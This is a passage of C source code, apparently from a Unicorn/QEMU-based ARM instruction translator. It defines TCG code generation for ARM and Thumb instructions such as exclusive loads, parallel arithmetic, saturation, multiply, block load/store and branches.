(a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_ldrex(s, a, MO_64, false); } static bool trans_LDREXD_t32(DisasContext *s, arg_LDREX *a) { return op_ldrex(s, a, MO_64, false); } static bool trans_LDREXB(DisasContext *s, arg_LDREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_ldrex(s, a, MO_8, false); } static bool trans_LDREXH(DisasContext *s, arg_LDREX *a) { if (s->thumb ? !ENABLE_ARCH_7 : !ENABLE_ARCH_6K) { return false; } return op_ldrex(s, a, MO_16, false); } static bool trans_LDAEX(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_32, true); } static bool trans_LDAEXD_a32(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rt & 1) { unallocated_encoding(s); return true; } a->rt2 = a->rt + 1; return op_ldrex(s, a, MO_64, true); } static bool trans_LDAEXD_t32(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_64, true); } static bool trans_LDAEXB(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_8, true); } static bool trans_LDAEXH(DisasContext *s, arg_LDREX *a) { if (!ENABLE_ARCH_8) { return false; } return op_ldrex(s, a, MO_16, true); } static bool op_lda(DisasContext *s, arg_LDA *a, MemOp mop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; if (!ENABLE_ARCH_8) { return false; } /* We UNDEF for these UNPREDICTABLE cases. */ if (a->rn == 15 || a->rt == 15) { unallocated_encoding(s); return true; } addr = load_reg(s, a->rn); tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), mop | s->be_data); disas_set_da_iss(s, mop, a->rt | ISSIsAcqRel); tcg_temp_free_i32(tcg_ctx, addr); store_reg(s, a->rt, tmp); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); return true; } static bool trans_LDA(DisasContext *s, arg_LDA *a) { return op_lda(s, a, MO_UL); } static bool trans_LDAB(DisasContext *s, arg_LDA *a) { return op_lda(s, a, MO_UB); } static bool trans_LDAH(DisasContext *s, arg_LDA *a) { return op_lda(s, a, MO_UW); } /* * Media instructions */ static bool trans_USADA8(DisasContext *s, arg_USADA8 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; if (!ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); gen_helper_usad8(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); if (a->ra != 15) { t2 = load_reg(s, a->ra); tcg_gen_add_i32(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); } store_reg(s, a->rd, t1); return true; } static bool op_bfx(DisasContext *s, arg_UBFX *a, bool u) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; int width = a->widthm1 + 1; int shift = a->lsb; if (!ENABLE_ARCH_6T2) { return false; } if (shift + width > 32) { /* UNPREDICTABLE; we choose to UNDEF */ unallocated_encoding(s); return true; } tmp = load_reg(s, a->rn); if (u) { tcg_gen_extract_i32(tcg_ctx, tmp, tmp, shift, width); } else { tcg_gen_sextract_i32(tcg_ctx, tmp, tmp, shift, width); } store_reg(s, a->rd, tmp); return true; } static bool trans_SBFX(DisasContext *s, arg_SBFX *a) { return op_bfx(s, a, false); } static bool trans_UBFX(DisasContext *s, arg_UBFX *a) { return op_bfx(s, a, true); } static bool trans_BFCI(DisasContext *s, arg_BFCI *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; int msb = a->msb, lsb = a->lsb; int width; if (!ENABLE_ARCH_6T2) { return false; } if (msb < lsb) { /* UNPREDICTABLE; we choose to UNDEF */ unallocated_encoding(s); return true; } width = msb + 1 - lsb; if (a->rn == 15) { /* BFC */ tmp = tcg_const_i32(tcg_ctx, 0); } else { /* BFI */ tmp = load_reg(s, a->rn); } if (width != 32) { TCGv_i32 tmp2 = load_reg(s, a->rd); tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, lsb, width); tcg_temp_free_i32(tcg_ctx, tmp2); } store_reg(s, a->rd, tmp); return true; } static bool trans_UDF(DisasContext *s, arg_UDF *a) { unallocated_encoding(s); return true; } /* * Parallel addition and subtraction */ static bool op_par_addsub(DisasContext *s, arg_rrr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t0 = load_reg(s, a->rn); t1 = load_reg(s, a->rm); gen(tcg_ctx, t0, t0, t1); tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->rd, t0); return true; } static bool op_par_addsub_ge(DisasContext *s, arg_rrr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1; TCGv_ptr ge; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t0 = load_reg(s, a->rn); t1 = load_reg(s, a->rm); ge = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ge, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); gen(tcg_ctx, t0, t0, t1, ge); tcg_temp_free_ptr(tcg_ctx, ge); tcg_temp_free_i32(tcg_ctx, t1); store_reg(s, a->rd, t0); return true; } #define DO_PAR_ADDSUB(NAME, helper) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { \ return op_par_addsub(s, a, helper); \ } #define DO_PAR_ADDSUB_GE(NAME, helper) \ static bool trans_##NAME(DisasContext *s, arg_rrr *a) \ { \ return op_par_addsub_ge(s, a, helper); \ } DO_PAR_ADDSUB_GE(SADD16, gen_helper_sadd16) DO_PAR_ADDSUB_GE(SASX, gen_helper_saddsubx) DO_PAR_ADDSUB_GE(SSAX, gen_helper_ssubaddx) DO_PAR_ADDSUB_GE(SSUB16, gen_helper_ssub16) DO_PAR_ADDSUB_GE(SADD8, gen_helper_sadd8) DO_PAR_ADDSUB_GE(SSUB8, gen_helper_ssub8) DO_PAR_ADDSUB_GE(UADD16, gen_helper_uadd16) DO_PAR_ADDSUB_GE(UASX, gen_helper_uaddsubx) DO_PAR_ADDSUB_GE(USAX, gen_helper_usubaddx) DO_PAR_ADDSUB_GE(USUB16, gen_helper_usub16) DO_PAR_ADDSUB_GE(UADD8, gen_helper_uadd8) DO_PAR_ADDSUB_GE(USUB8, gen_helper_usub8) DO_PAR_ADDSUB(QADD16, gen_helper_qadd16) DO_PAR_ADDSUB(QASX, gen_helper_qaddsubx) DO_PAR_ADDSUB(QSAX, gen_helper_qsubaddx) DO_PAR_ADDSUB(QSUB16, gen_helper_qsub16) DO_PAR_ADDSUB(QADD8, gen_helper_qadd8) DO_PAR_ADDSUB(QSUB8, gen_helper_qsub8) DO_PAR_ADDSUB(UQADD16, gen_helper_uqadd16) DO_PAR_ADDSUB(UQASX, gen_helper_uqaddsubx) DO_PAR_ADDSUB(UQSAX, gen_helper_uqsubaddx) DO_PAR_ADDSUB(UQSUB16, gen_helper_uqsub16) DO_PAR_ADDSUB(UQADD8, gen_helper_uqadd8) DO_PAR_ADDSUB(UQSUB8, gen_helper_uqsub8) DO_PAR_ADDSUB(SHADD16, gen_helper_shadd16) DO_PAR_ADDSUB(SHASX, gen_helper_shaddsubx) DO_PAR_ADDSUB(SHSAX, gen_helper_shsubaddx) DO_PAR_ADDSUB(SHSUB16, gen_helper_shsub16) DO_PAR_ADDSUB(SHADD8, gen_helper_shadd8) DO_PAR_ADDSUB(SHSUB8, gen_helper_shsub8) DO_PAR_ADDSUB(UHADD16, gen_helper_uhadd16) DO_PAR_ADDSUB(UHASX, gen_helper_uhaddsubx) DO_PAR_ADDSUB(UHSAX, gen_helper_uhsubaddx) DO_PAR_ADDSUB(UHSUB16, gen_helper_uhsub16) DO_PAR_ADDSUB(UHADD8, gen_helper_uhadd8) DO_PAR_ADDSUB(UHSUB8, gen_helper_uhsub8) #undef DO_PAR_ADDSUB #undef DO_PAR_ADDSUB_GE /* * Packing, unpacking, saturation, and reversal */ static bool trans_PKH(DisasContext *s, arg_PKH *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tn, tm; int shift = a->imm; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } tn = load_reg(s, a->rn); tm = load_reg(s, a->rm); if (a->tb) { /* PKHTB */ if (shift == 0) { shift = 31; } tcg_gen_sari_i32(tcg_ctx, tm, tm, shift); tcg_gen_deposit_i32(tcg_ctx, tn, tn, tm, 0, 16); } else { /* PKHBT */ tcg_gen_shli_i32(tcg_ctx, tm, tm, shift); tcg_gen_deposit_i32(tcg_ctx, tn, tm, tn, 0, 16); } tcg_temp_free_i32(tcg_ctx, tm); store_reg(s, a->rd, tn); return true; } static bool op_sat(DisasContext *s, arg_sat *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_env, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp, satimm; int shift = a->imm; if (!ENABLE_ARCH_6) { return false; } tmp = load_reg(s, a->rn); if (a->sh) { tcg_gen_sari_i32(tcg_ctx, tmp, tmp, shift ? shift : 31); } else { tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); } satimm = tcg_const_i32(tcg_ctx, a->satimm); gen(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, satimm); tcg_temp_free_i32(tcg_ctx, satimm); store_reg(s, a->rd, tmp); return true; } static bool trans_SSAT(DisasContext *s, arg_sat *a) { return op_sat(s, a, gen_helper_ssat); } static bool trans_USAT(DisasContext *s, arg_sat *a) { return op_sat(s, a, gen_helper_usat); } static bool trans_SSAT16(DisasContext *s, arg_sat *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_sat(s, a, gen_helper_ssat16); } static bool trans_USAT16(DisasContext *s, arg_sat *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_sat(s, a, gen_helper_usat16); } static bool op_xta(DisasContext *s, arg_rrr_rot *a, void (*gen_extract)(TCGContext *, TCGv_i32, TCGv_i32), void (*gen_add)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_6) { return false; } tmp = load_reg(s, a->rm); /* * TODO: In many cases we could do a shift instead of a rotate. * Combined with a simple extend, that becomes an extract. */ tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, a->rot * 8); gen_extract(tcg_ctx, tmp, tmp); if (a->rn != 15) { TCGv_i32 tmp2 = load_reg(s, a->rn); gen_add(tcg_ctx, tmp, tmp, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); } store_reg(s, a->rd, tmp); return true; } static bool trans_SXTAB(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext8s_i32, tcg_gen_add_i32); } static bool trans_SXTAH(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext16s_i32, tcg_gen_add_i32); } static bool trans_SXTAB16(DisasContext *s, arg_rrr_rot *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_xta(s, a, gen_helper_sxtb16, gen_add16); } static bool trans_UXTAB(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext8u_i32, tcg_gen_add_i32); } static bool trans_UXTAH(DisasContext *s, arg_rrr_rot *a) { return op_xta(s, a, tcg_gen_ext16u_i32, tcg_gen_add_i32); } static bool trans_UXTAB16(DisasContext *s, arg_rrr_rot *a) { if (s->thumb && !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP)) { return false; } return op_xta(s, a, gen_helper_uxtb16, gen_add16); } static bool trans_SEL(DisasContext *s, arg_rrr *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2, t3; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t3, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); gen_helper_sel_flags(tcg_ctx, t1, t3, t1, t2); tcg_temp_free_i32(tcg_ctx, t3); tcg_temp_free_i32(tcg_ctx, t2); store_reg(s, a->rd, t1); return true; } static bool op_rr(DisasContext *s, arg_rr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = load_reg(s, a->rm); gen(tcg_ctx, tmp, tmp); store_reg(s, a->rd, tmp); return true; } static bool trans_REV(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6) { return false; } return op_rr(s, a, tcg_gen_bswap32_i32); } static bool trans_REV16(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6) { return false; } return op_rr(s, a, gen_rev16); } static bool trans_REVSH(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6) { return false; } return op_rr(s, a, gen_revsh); } static bool trans_RBIT(DisasContext *s, arg_rr *a) { if (!ENABLE_ARCH_6T2) { return false; } return op_rr(s, a, gen_helper_rbit); } /* * Signed multiply, signed and unsigned divide */ static bool op_smlad(DisasContext *s, arg_rrrr *a, bool m_swap, bool sub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; if (!ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); if (m_swap) { gen_swap_half(tcg_ctx, t2); } gen_smul_dual(tcg_ctx, t1, t2); if (sub) { /* This subtraction cannot overflow. */ tcg_gen_sub_i32(tcg_ctx, t1, t1, t2); } else { /* * This addition cannot overflow 32 bits; however it may * overflow considered as a signed operation, in which case * we must set the Q flag. */ gen_helper_add_setq(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); } tcg_temp_free_i32(tcg_ctx, t2); if (a->ra != 15) { t2 = load_reg(s, a->ra); gen_helper_add_setq(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); } store_reg(s, a->rd, t1); return true; } static bool trans_SMLAD(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, false, false); } static bool trans_SMLADX(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, true, false); } static bool trans_SMLSD(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, false, true); } static bool trans_SMLSDX(DisasContext *s, arg_rrrr *a) { return op_smlad(s, a, true, true); } static bool op_smlald(DisasContext *s, arg_rrrr *a, bool m_swap, bool sub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; TCGv_i64 l1, l2; if (!ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); if (m_swap) { gen_swap_half(tcg_ctx, t2); } gen_smul_dual(tcg_ctx, t1, t2); l1 = tcg_temp_new_i64(tcg_ctx); l2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, l1, t1); tcg_gen_ext_i32_i64(tcg_ctx, l2, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); if (sub) { tcg_gen_sub_i64(tcg_ctx, l1, l1, l2); } else { tcg_gen_add_i64(tcg_ctx, l1, l1, l2); } tcg_temp_free_i64(tcg_ctx, l2); gen_addq(s, l1, a->ra, a->rd); gen_storeq_reg(s, a->ra, a->rd, l1); tcg_temp_free_i64(tcg_ctx, l1); return true; } static bool trans_SMLALD(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, false, false); } static bool trans_SMLALDX(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, true, false); } static bool trans_SMLSLD(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, false, true); } static bool trans_SMLSLDX(DisasContext *s, arg_rrrr *a) { return op_smlald(s, a, true, true); } static bool op_smmla(DisasContext *s, arg_rrrr *a, bool round, bool sub) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); tcg_gen_muls2_i32(tcg_ctx, t2, t1, t1, t2); if (a->ra != 15) { TCGv_i32 t3 = load_reg(s, a->ra); if (sub) { /* * For SMMLS, we need a 64-bit subtract. Borrow caused by * a non-zero multiplicand lowpart, and the correct result * lowpart for rounding. */ TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_sub2_i32(tcg_ctx, t2, t1, zero, t3, t2, t1); tcg_temp_free_i32(tcg_ctx, zero); } else { tcg_gen_add_i32(tcg_ctx, t1, t1, t3); } tcg_temp_free_i32(tcg_ctx, t3); } if (round) { /* * Adding 0x80000000 to the 64-bit quantity means that we have * carry in to the high word when the low word has the msb set. */ tcg_gen_shri_i32(tcg_ctx, t2, t2, 31); tcg_gen_add_i32(tcg_ctx, t1, t1, t2); } tcg_temp_free_i32(tcg_ctx, t2); store_reg(s, a->rd, t1); return true; } static bool trans_SMMLA(DisasContext *s, arg_rrrr *a) { return op_smmla(s, a, false, false); } static bool trans_SMMLAR(DisasContext *s, arg_rrrr *a) { return op_smmla(s, a, true, false); } static bool trans_SMMLS(DisasContext *s, arg_rrrr *a) { return op_smmla(s, a, false, true); } static bool trans_SMMLSR(DisasContext *s, arg_rrrr *a) { return op_smmla(s, a, true, true); } static bool op_div(DisasContext *s, arg_rrr *a, bool u) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; if (s->thumb ? !dc_isar_feature(aa32_thumb_div, s) : !dc_isar_feature(aa32_arm_div, s)) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); if (u) { gen_helper_udiv(tcg_ctx, t1, t1, t2); } else { gen_helper_sdiv(tcg_ctx, t1, t1, t2); } tcg_temp_free_i32(tcg_ctx, t2); store_reg(s, a->rd, t1); return true; } static bool trans_SDIV(DisasContext *s, arg_rrr *a) { return op_div(s, a, false); } static bool trans_UDIV(DisasContext *s, arg_rrr *a) { return op_div(s, a, true); } /* * Block data transfer */ static TCGv_i32 op_addr_block_pre(DisasContext *s, arg_ldst_block *a, int n) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr = load_reg(s, a->rn); if (a->b) { if (a->i) { /* pre increment */ tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); } else { /* pre decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4)); } } else if (!a->i && n != 1) { /* post decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4)); } if (s->v8m_stackcheck && a->rn == 13 && a->w) { /* * If the writeback is incrementing SP rather than * decrementing it, and the initial SP is below the * stack limit but the final written-back SP would * be above, then then we must not perform any memory * accesses, but it is IMPDEF whether we generate * an exception. We choose to do so in this case. * At this point 'addr' is the lowest address, so * either the original SP (if incrementing) or our * final SP (if decrementing), so that's what we check. */ gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } return addr; } static void op_addr_block_post(DisasContext *s, arg_ldst_block *a, TCGv_i32 addr, int n) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->w) { /* write back */ if (!a->b) { if (a->i) { /* post increment */ tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); } else { /* post decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4)); } } else if (!a->i && n != 1) { /* pre decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4)); } store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } } static bool op_stm(DisasContext *s, arg_ldst_block *a, int min_n) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i, j, n, list, mem_idx; bool user = a->u; TCGv_i32 addr, tmp, tmp2; if (user) { /* STM (user) */ if (IS_USER(s)) { /* Only usable in supervisor mode. */ unallocated_encoding(s); return true; } } list = a->list; n = ctpop16(list); if (n < min_n || a->rn == 15) { unallocated_encoding(s); return true; } addr = op_addr_block_pre(s, a, n); mem_idx = get_mem_index(s); for (i = j = 0; i < 16; i++) { if (!(list & (1 << i))) { continue; } if (user && i != 15) { tmp = tcg_temp_new_i32(tcg_ctx); tmp2 = tcg_const_i32(tcg_ctx, i); gen_helper_get_user_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); } else { tmp = load_reg(s, i); } gen_aa32_st32(s, tmp, addr, mem_idx); tcg_temp_free_i32(tcg_ctx, tmp); /* No need to add after the last transfer. */ if (++j != n) { tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); } } op_addr_block_post(s, a, addr, n); return true; } static bool trans_STM(DisasContext *s, arg_ldst_block *a) { /* BitCount(list) < 1 is UNPREDICTABLE */ return op_stm(s, a, 1); } static bool trans_STM_t32(DisasContext *s, arg_ldst_block *a) { /* Writeback register in register list is UNPREDICTABLE for T32. */ if (a->w && (a->list & (1 << a->rn))) { unallocated_encoding(s); return true; } /* BitCount(list) < 2 is UNPREDICTABLE */ return op_stm(s, a, 2); } static bool do_ldm(DisasContext *s, arg_ldst_block *a, int min_n) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i, j, n, list, mem_idx; bool loaded_base; bool user = a->u; bool exc_return = false; TCGv_i32 addr, tmp, tmp2, loaded_var; if (user) { /* LDM (user), LDM (exception return) */ if (IS_USER(s)) { /* Only usable in supervisor mode. */ unallocated_encoding(s); return true; } if (extract32(a->list, 15, 1)) { exc_return = true; user = false; } else { /* LDM (user) does not allow writeback. */ if (a->w) { unallocated_encoding(s); return true; } } } list = a->list; n = ctpop16(list); if (n < min_n || a->rn == 15) { unallocated_encoding(s); return true; } addr = op_addr_block_pre(s, a, n); mem_idx = get_mem_index(s); loaded_base = false; loaded_var = NULL; for (i = j = 0; i < 16; i++) { if (!(list & (1 << i))) { continue; } tmp = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, tmp, addr, mem_idx); if (user) { tmp2 = tcg_const_i32(tcg_ctx, i); gen_helper_set_user_reg(tcg_ctx, tcg_ctx->cpu_env, tmp2, tmp); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); } else if (i == a->rn) { loaded_var = tmp; loaded_base = true; } else if (i == 15 && exc_return) { store_pc_exc_ret(s, tmp); } else { store_reg_from_load(s, i, tmp); } /* No need to add after the last transfer. */ if (++j != n) { tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); } } op_addr_block_post(s, a, addr, n); if (loaded_base) { /* Note that we reject base == pc above. */ store_reg(s, a->rn, loaded_var); } if (exc_return) { /* Restore CPSR from SPSR. */ tmp = load_cpu_field(tcg_ctx, spsr); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { // gen_io_start(tcg_ctx); } gen_helper_cpsr_write_eret(tcg_ctx, tcg_ctx->cpu_env, tmp); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { // gen_io_end(tcg_ctx); } tcg_temp_free_i32(tcg_ctx, tmp); /* Must exit loop to check un-masked IRQs */ s->base.is_jmp = DISAS_EXIT; } return true; } static bool trans_LDM_a32(DisasContext *s, arg_ldst_block *a) { /* * Writeback register in register list is UNPREDICTABLE * for ArchVersion() >= 7. Prior to v7, A32 would write * an UNKNOWN value to the base register. */ if (ENABLE_ARCH_7 && a->w && (a->list & (1 << a->rn))) { unallocated_encoding(s); return true; } /* BitCount(list) < 1 is UNPREDICTABLE */ return do_ldm(s, a, 1); } static bool trans_LDM_t32(DisasContext *s, arg_ldst_block *a) { /* Writeback register in register list is UNPREDICTABLE for T32. */ if (a->w && (a->list & (1 << a->rn))) { unallocated_encoding(s); return true; } /* BitCount(list) < 2 is UNPREDICTABLE */ return do_ldm(s, a, 2); } static bool trans_LDM_t16(DisasContext *s, arg_ldst_block *a) { /* Writeback is conditional on the base register not being loaded. */ a->w = !(a->list & (1 << a->rn)); /* BitCount(list) < 1 is UNPREDICTABLE */ return do_ldm(s, a, 1); } /* * Branch, branch with link */ static bool trans_B(DisasContext *s, arg_i *a) { gen_jmp(s, read_pc(s) + a->imm); return true; } static bool trans_B_cond_thumb(DisasContext *s, arg_ci *a) { /* This has cond from encoding, required to be outside IT block. */ if (a->cond >= 0xe) { return false; } if (s->condexec_mask) { unallocated_encoding(s); return true; } arm_skip_unless(s, a->cond); gen_jmp(s, read_pc(s) + a->imm); return true; } static bool trans_BL(DisasContext *s, arg_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | s->thumb); gen_jmp(s, read_pc(s) + a->imm); return true; } static bool trans_BLX_i(DisasContext *s, arg_BLX_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; /* For A32, ARCH(5) is checked near the start of the uncond block. */ if (s->thumb && (a->imm & 2)) { return false; } tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | s->thumb); tmp = tcg_const_i32(tcg_ctx, !s->thumb); store_cpu_field(tcg_ctx, tmp, thumb); gen_jmp(s, (read_pc(s) & ~3) + a->imm); return true; } static bool trans_BL_BLX_prefix(DisasContext *s, arg_BL_BLX_prefix *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; assert(!arm_dc_feature(s, ARM_FEATURE_THUMB2)); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], read_pc(s) + (a->imm << 12)); return true; } static bool trans_BL_suffix(DisasContext *s, arg_BL_suffix *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); assert(!arm_dc_feature(s, ARM_FEATURE_THUMB2)); tcg_gen_addi_i32(tcg_ctx, tmp, tcg_ctx->cpu_R[14], (a->imm << 1) | 1); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | 1); gen_bx(s, tmp); return true; } static bool trans_BLX_suffix(DisasContext *s, arg_BLX_suffix *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; assert(!arm_dc_feature(s, ARM_FEATURE_THUMB2)); if (!ENABLE_ARCH_5) { return false; } tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, tmp, tcg_ctx->cpu_R[14], a->imm << 1); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xfffffffc); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | 1); gen_bx(s, tmp); return true; } static bool op_tbranch(DisasContext *s, arg_tbranch *a, bool half) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; tmp = load_reg(s, a->rm); if (half) { tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp); } addr = load_reg(s, a->rn); tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), half ? MO_UW | s->be_data : MO_UB); tcg_temp_free_i32(tcg_ctx, addr); tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp); tcg_gen_addi_i32(tcg_ctx, tmp, tmp, read_pc(s)); store_reg(s, 15, tmp); return true; } static bool trans_TBB(DisasContext *s, arg_tbranch *a) { return op_tbranch(s, a, false); } static bool trans_TBH(DisasContext *s, arg_tbranch *a) { return op_tbranch(s, a, true); } static bool trans_CBZ(DisasContext *s, arg_CBZ *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = load_reg(s, a->rn); arm_gen_condlabel(s); tcg_gen_brcondi_i32(tcg_ctx, a->nz ? TCG_COND_EQ : TCG_COND_NE, tmp, 0, s->condlabel); tcg_temp_free_i32(tcg_ctx, tmp); gen_jmp(s, read_pc(s) + a->imm); return true; } /* * Supervisor call - both T32 & A32 come here so we need to check * which mode we are in when checking for semihosting. */ static bool trans_SVC(DisasContext *s, arg_SVC *a) { const uint32_t semihost_imm = s->thumb ? 0xab : 0x123456; if (!arm_dc_feature(s, ARM_FEATURE_M) && false && // semihosting_enabled() && !IS_USER(s) && (a->imm == semihost_imm)) { gen_exception_internal_insn(s, s->pc_curr, EXCP_SEMIHOST); } else { gen_set_pc_im(s, s->base.pc_next); s->svc_imm = a->imm; s->base.is_jmp = DISAS_SWI; } return true; } /* * Unconditional system instructions */ static bool trans_RFE(DisasContext *s, arg_RFE *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static const int8_t pre_offset[4] = { /* DA */ -4, /* IA */ 0, /* DB */ -8, /* IB */ 4 }; static const int8_t post_offset[4] = { /* DA */ -8, /* IA */ 4, /* DB */ -4, /* IB */ 0 }; TCGv_i32 addr, t1, t2; if (!ENABLE_ARCH_6 || 